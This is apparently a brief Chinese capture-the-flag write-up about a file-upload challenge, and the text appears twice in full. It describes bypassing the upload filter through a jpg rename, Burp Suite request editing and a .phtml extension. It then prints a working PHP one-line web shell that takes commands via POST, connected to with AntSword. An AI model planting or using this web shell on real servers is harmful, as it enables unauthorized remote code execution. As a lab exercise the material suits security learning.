使用php一句话木马
上传后,提示:
改成jpg上传,
成功,接下来使用BP改包
改了两个地方,
然后被发现了。
尝试改php后缀
为phtml
虽然上传成功,但是蚁剑无法连接。
原因,PHP一句话木马写错了,把POST方法写成了GET方法。
正确的应该是:
<?php @eval($_POST['123456']);?>
重新改马,重新上传。
上传成功:
使用蚁剑连接破处,在根目录找到flag。
使用php一句话木马
上传后,提示:
改成jpg上传,
成功,接下来使用BP改包
改了两个地方,
然后被发现了。
尝试改php后缀
为phtml
虽然上传成功,但是蚁剑无法连接。
原因,PHP一句话木马写错了,把POST方法写成了GET方法。
正确的应该是:
<?php @eval($_POST['123456']);?>
重新改马,重新上传。
上传成功:
使用蚁剑连接破处,在根目录找到flag。